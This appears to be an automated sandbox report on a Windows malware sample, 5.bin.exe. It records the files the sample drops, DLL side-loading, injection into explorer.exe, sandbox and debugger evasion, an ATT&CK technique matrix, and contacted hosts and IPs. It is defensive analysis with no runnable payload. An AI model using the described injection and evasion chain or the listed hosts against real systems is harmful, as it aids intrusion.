Source: Binary string: wntdll.pdb source: Dashboard.exe, 00000001.00000002.259471774.000000000278C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282932233.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282756977.00000000055C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Dashboard.pdb source: Dashboard.exe, Dashboard.exe, 00000001.00000000.255320025.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Dashboard.exe, 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Dashboard.exe.0.dr
Source: Binary string: UXCore.pdb source: Dashboard.exe, 00000001.00000002.259802738.0000000070301000.00000020.00000001.01000000.00000006.sdmp, UXCore.dll.0.dr
Source: 5.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 5.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 5.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 5.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 5.bin.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_010088FB push ecx; ret 1_2_0100890E
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_010086D9 push ecx; ret 1_2_010086EC
Source: vbgwfn.3.drStatic PE information: section name: .00cfg
Source: vbgwfn.3.drStatic PE information: section name: .voltbl
Source: vbgwfn.3.drStatic PE information: section name: _RDATA
Source: vbgwfn.3.drStatic PE information: section name: ./9=
Source: vbgwfn.3.drStatic PE information: section name: bjo
Source: UXCore.dll.0.drStatic PE information: real checksum: 0xd0519 should be: 0xcc92c
Source: 5.bin.exeStatic PE information: real checksum: 0x1d11bc should be: 0x1c791c
Source: vbgwfn.3.drStatic PE information: real checksum: 0x0 should be: 0x57abf
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\vbgwfnJump to dropped file
Source: C:\Users\user\Desktop\5.bin.exeFile created: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeJump to dropped file
Source: C:\Users\user\Desktop\5.bin.exeFile created: C:\Users\user\AppData\Roaming\msls31\UXCore.dllJump to dropped file
Source: C:\Users\user\Desktop\5.bin.exeFile created: C:\Users\user\AppData\Roaming\msls31\msvcr80.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\vbgwfnJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\VBGWFN
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_01014442 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_01014442
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\5.bin.exe TID: 5240Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeMemory allocated: EB0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\5.bin.exeProcess information queried: ProcessInformationJump to behavior
Source: explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
Source: explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
Source: explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
Source: explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
Source: explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
Source: Dashboard.exe, 00000001.00000002.259196928.0000000000B32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mwww.@vmware"m0
Source: TZJMATWAPSHXLMF.0.drBinary or memory string: TQEMu
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_010087FB IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,1_2_010087FB
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_0100769A GetProcessHeap,GetProcessHeap,HeapSetInformation,HeapSetInformation,GetProcessHeap,HeapSetInformation,GetLastError,CoInitializeEx,?RMInitialize@@YGXXZ,?RMUpdateResourceSet@@YG_NPB_WK00@Z,?RMUpdateResourceSet@@YG_NPB_WK00@Z,?RMUpdateResourceSet@@YG_NPB_WK00@Z,?RMUpdateResourceSet@@YG_NPB_WK00@Z,UXCoreInitProcess,UXCoreInitThread,GetMessageW,TranslateMessage,DispatchMessageW,GetMessageW,UXCoreUnInitThread,UXCoreUnInitProcess,?RMTerminate@@YGXXZ,CoUninitialize,CloseHandle,1_2_0100769A
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_010087FB IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,1_2_010087FB

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeSection loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: C:\Users\user\AppData\Local\Temp\vbgwfn target: C:\Windows\explorer.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\explorer.exe base: 7FF761C48150Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\explorer.exe base: E37010Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\explorer.exe base: 140000000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 2172 base: 7FF761C48150 value: 48Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 2172 base: E37010 value: 00Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 2172 base: 140000000 value: 00Jump to behavior
Source: C:\Users\user\Desktop\5.bin.exeProcess created: C:\Users\user\AppData\Roaming\msls31\Dashboard.exe C:\Users\user\AppData\Roaming\msls31\Dashboard.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,1_2_0100821F
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_01015935 cpuid 1_2_01015935
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_01008BC5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_01008BC5
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_0100737C __EH_prolog3_GS,GetVersionExW,1_2_0100737C
Source: C:\Users\user\AppData\Roaming\msls31\Dashboard.exeCode function: 1_2_0101289C __EH_prolog3_GS,?StartDefer@Element@DirectUI@@SGXXZ,??2@YAPAXI@Z,??0CRMDUIParser@@QAE@XZ,?LoadAndCreateElement@CRMDUIParser@@QAEJIPB_WPAPAVElement@DirectUI@@PAV23@K0@Z,GetForegroundWindow,?Initialize@NativeHWNDHost@DirectUI@@QAEJPB_W0PAUHWND__@@PAUHICON__@@HHHHHHHPAUHINSTANCE__@@I@Z,?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ,?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ,GetSystemMenu,RemoveMenu,?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ,SetWindowPos,?RMLoadIcon@@YGPAUHICON__@@PB_WK0@Z,?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ,SendMessageW,?RMLoadString@@YGIIPA_WIKPB_W@Z,?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ,SetWindowTextW,?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ,?Create@HWNDElement@DirectUI@@SGJPAUHWND__@@_NI1PAPAVElement@2@@Z,?Host@NativeHWNDHost@DirectUI@@QAEXPAVElement@2@@Z,?AddListener@Element@DirectUI@@QAEJPAUIElementListener@2@@Z,?Add@Element@DirectUI@@QAEJPAV12@@Z,?Attach@CRMDUIParser@@QAEJPAVElement@DirectUI@@@Z,?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ,BuildDropTarget,?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ,?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ,PostMessageW,?EndDefer@Element@DirectUI@@SGXXZ,1_2_0101289C
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Access Token Manipulation
11
Masquerading
1
Input Capture
1
System Time Discovery
Remote Services1
Email Collection
Exfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
Process Injection
2
Virtualization/Sandbox Evasion
LSASS Memory21
Security Software Discovery
Remote Desktop Protocol1
Input Capture
Exfiltration Over Bluetooth1
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)1
DLL Side-Loading
1
Access Token Manipulation
Security Account Manager2
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)311
Process Injection
NTDS1
Process Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA Secrets1
Remote System Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common2
Obfuscated Files or Information
Cached Domain Credentials23
System Information Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
DLL Side-Loading
DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
5.bin.exe11%ReversingLabsWin64.Malware.Generic
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\vbgwfn100%AviraHEUR/AGEN.1319100
C:\Users\user\AppData\Local\Temp\vbgwfn100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\msls31\Dashboard.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\msls31\UXCore.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\msls31\msvcr80.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://ocsp.thawte.com00%URL Reputationsafe
http://crl3.digicert.co(m/D0%Avira URL Cloudsafe
http://c0rl.m%L0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
doi.org
104.26.8.237
truefalse
    high
    dvjbn4sg4p1ck.cloudfront.net
    18.165.183.85
    truefalse
      high
      i.ibb.co
      162.19.58.158
      truefalse
        high
        www.doi.org
        unknown
        unknownfalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://www.doi.org/false
            high
            https://doi.org/false
              high
              https://i.ibb.co/26Q0f9R/2870308898.pngfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                http://runonce.msn.com/?v=msgrv75Dashboard.exefalse
                  high
                  http://www.vmware.com/0Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://crl.thawte.com/ThawteTimestampingCA.crl05.bin.exefalse
                      high
                      http://www.symauth.com/cps095.bin.exefalse
                        high
                        http://www.symauth.com/rpa00Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://ocsp.thawte.com05.bin.exefalse
                          • URL Reputation: safe
                          unknown
                          http://get.live.com/0Dashboard.exe.0.drfalse
                            high
                            http://www.info-zip.org/Dashboard.exe, 00000001.00000002.259287365.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.0000000003877000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.00000000011DB000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://crl3.digicert.co(m/DDashboard.exe, 00000001.00000002.259196928.0000000000B32000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              low
                              http://www.vmware.com/0/Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.symauth.com/rpa045.bin.exefalse
                                  high
                                  http://c0rl.m%LDashboard.exe, 00000001.00000002.259196928.0000000000B32000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://ie.search.msn.com/Dashboard.exefalse
                                    high
                                    http://www.symauth.com/cps0(Dashboard.exe, 00000001.00000002.259287365.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.282593493.00000000038BE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.287516790.000000000122B000.00000004.00000020.00020000.00000000.sdmp, 5.bin.exefalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.26.8.237
                                      doi.orgUnited States
                                      13335CLOUDFLARENETUSfalse
                                      18.165.183.85
                                      dvjbn4sg4p1ck.cloudfront.netUnited States
                                      3MIT-GATEWAYSUSfalse
                                      162.19.58.158
                                      i.ibb.coUnited States
                                      209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                      Joe Sandbox Version:38.0.0 Beryl
                                      Analysis ID:1299636
                                      Start date and time:2023-08-29 19:15:39 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 11m 50s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:21
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample file name:5.bin.exe
                                      Detection:MAL
                                      Classification:mal72.evad.winEXE@9/11@3/3
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 99.8% (good quality ratio 94.8%)
                                      • Quality average: 72.8%
                                      • Quality standard deviation: 31.6%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 66
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 13.89.179.12
                                      • Excluded domains from analysis (whitelisted): www.bing.com, kv601.prod.do.dsp.mp.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, eudb.ris.api.iris.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com
                                      • Execution Graph export aborted for target Dashboard.exe, PID 6280 because there are no executed function
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: 5.bin.exe
                                      TimeTypeDescription
                                      19:16:41API Interceptor2x Sleep call for process: 5.bin.exe modified
                                      19:16:57API Interceptor1x Sleep call for process: Dashboard.exe modified
                                      19:17:02API Interceptor5x Sleep call for process: cmd.exe modified
                                      19:17:11API Interceptor1x Sleep call for process: WerFault.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.26.8.2374.bin.exeGet hashmaliciousKnightCryptBrowse
                                        Advanced_IP_Scanner.exeGet hashmaliciousDanaBotBrowse
                                          Advanced_IP_Scanner.exeGet hashmaliciousDanaBotBrowse
                                            big_massive_gibbon.exeGet hashmaliciousUnknownBrowse
                                              wAbul0hq7j.exeGet hashmaliciousTofsee XmrigBrowse
                                                18.165.183.852.bin.exeGet hashmaliciousUnknownBrowse
                                                  4Fau7Mt9J9.exeGet hashmaliciousSystemBCBrowse
                                                    https://urlz.fr/mEKnGet hashmaliciousUnknownBrowse
                                                      http://aarp.org/researchGet hashmaliciousHTMLPhisherBrowse
                                                        http://collab.pm/Get hashmaliciousUnknownBrowse
                                                          Invest in the Community Investment Note - Calvert Impact Capital.htmlGet hashmaliciousUnknownBrowse
                                                            https://rise.articulate.com/share/UVgR1Hsd5fmIu-7UcZJOaD3lRxa-tj0eGet hashmaliciousUnknownBrowse
                                                              162.19.58.1588.bin.exeGet hashmaliciousUnknownBrowse
                                                                10.bin.exeGet hashmaliciousUnknownBrowse
                                                                  3.bin.exeGet hashmaliciousUnknownBrowse
                                                                    http://clouuds-haze-bca9.esalasaimr-c19.workers.devGet hashmaliciousHTMLPhisherBrowse
                                                                      RFQ_No.8964502.exeGet hashmaliciousAveMaria, DarkTortilla, UACMeBrowse
                                                                        TripAdvisor Complaint - Possible Suspension.exeGet hashmaliciousUnknownBrowse
                                                                          qWPmliKXpb.exeGet hashmaliciousDarkTortilla, LummaC Stealer, XWormBrowse
                                                                            https://protect-eu.mimecast.com/s/T6pRC8qvns8pVlhne8Fl?domain=pba.phGet hashmaliciousHTMLPhisherBrowse
                                                                              Revised_Invoice_No_8562023.exeGet hashmaliciousAveMaria, DarkTortilla, UACMeBrowse
                                                                                inquiry.gz.exeGet hashmaliciousAveMaria, DarkTortilla, UACMeBrowse
                                                                                  RFQ_56878899-2023.exeGet hashmaliciousAveMaria, DarkTortilla, UACMeBrowse
                                                                                    PO.No.1006309834.exeGet hashmaliciousAveMaria, DarkTortilla, UACMeBrowse
                                                                                      Orden_Nx-0019383-938990.exeGet hashmaliciousAveMaria, DarkTortilla, UACMeBrowse
                                                                                        rPO_87643445672023.exeGet hashmaliciousAveMaria, DarkTortilla, UACMeBrowse
                                                                                          HRViha ForMolly.collins.htmGet hashmaliciousUnknownBrowse
                                                                                            ahffka.exeGet hashmaliciousRemcos, DarkTortillaBrowse
                                                                                              TT.gz.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                Po_No_987655868.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  https://bankraiffeisen-ch.web.appGet hashmaliciousUnknownBrowse
                                                                                                    E1NgmiyeiQ.exeGet hashmaliciousUnknownBrowse
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      doi.orgRESULTADOS Y DISCUSI_N M_ JOS_ TELLO L_PEZ_Rev_Mariela.docxGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.9.237
                                                                                                      RESULTADOS Y DISCUSI_N M_ JOS_ TELLO L_PEZ_Rev_Mariela.docxGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.9.237
                                                                                                      RdtoOe8Lzj.exeGet hashmaliciousRaccoon RedLine SmokeLoader TofseeBrowse
                                                                                                      • 172.67.72.147
                                                                                                      BbQr9AZ6nv.exeGet hashmaliciousTofsee XmrigBrowse
                                                                                                      • 172.67.72.147
                                                                                                      pwHLvnynaD.exeGet hashmaliciousTofseeBrowse
                                                                                                      • 104.26.9.237
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      CLOUDFLARENETUS2.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.72.147
                                                                                                      1.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.9.237
                                                                                                      new_order_green_valley.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • 188.114.96.7
                                                                                                      2fp8YWepL5.exeGet hashmaliciousAveMaria, NSISDropper, UACMeBrowse
                                                                                                      • 172.67.190.177
                                                                                                      Invoice#1012_.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 104.17.96.13
                                                                                                      yQWPf8hWfh.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 162.159.132.53
                                                                                                      ACH_REMITTANCE.xlsbGet hashmaliciousUnknownBrowse
                                                                                                      • 188.114.96.7
                                                                                                      4.bin.exeGet hashmaliciousKnightCryptBrowse
                                                                                                      • 104.26.8.237
                                                                                                      1kwSw6DT3r.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 172.68.212.93
                                                                                                      4.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.72.147
                                                                                                      UTNwj8fUqU.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                      • 188.114.97.7
                                                                                                      https://s3t4u5v6w7x8y9.f9s.ru/r7T4y1N9h6/Get hashmaliciousUnknownBrowse
                                                                                                      • 104.18.11.29
                                                                                                      OxE16dZB4b.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                      • 172.67.196.114
                                                                                                      https://privilegesbtransportation.com/wp-content/intc/Bgcastamford/lmehrturlis@bgcastamford.orgGet hashmaliciousUnknownBrowse
                                                                                                      • 104.16.123.96
                                                                                                      3.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.72.147
                                                                                                      https://tinyurl.com/ye22h3ycGet hashmaliciousUnknownBrowse
                                                                                                      • 104.18.20.206
                                                                                                      https://pub-9e7794253dd24583871914240037bf39.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 104.18.11.29
                                                                                                      https://tinyurl.com/ye22h3ycGet hashmaliciousUnknownBrowse
                                                                                                      • 104.18.20.206
                                                                                                      https://predesigned-021-67434.gr-site.com/Get hashmaliciousUnknownBrowse
                                                                                                      • 104.16.123.96
                                                                                                      Uecqyndauhl.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 162.159.134.233
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      ce5f3254611a8c095a3d821d445398772.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      1.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      6.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      8.bin.exeGet hashmaliciousKnightCryptBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      10.bin.exeGet hashmaliciousKnightCryptBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      9.bin.exeGet hashmaliciousKnightCryptBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      cn_flash_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      8.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      9.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      10.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
                                                                                                      4.bin.exeGet hashmaliciousKnightCryptBrowse
                                                                                                      • 104.26.8.237
                                                                                                      • 18.165.183.85
                                                                                                      • 162.19.58.158
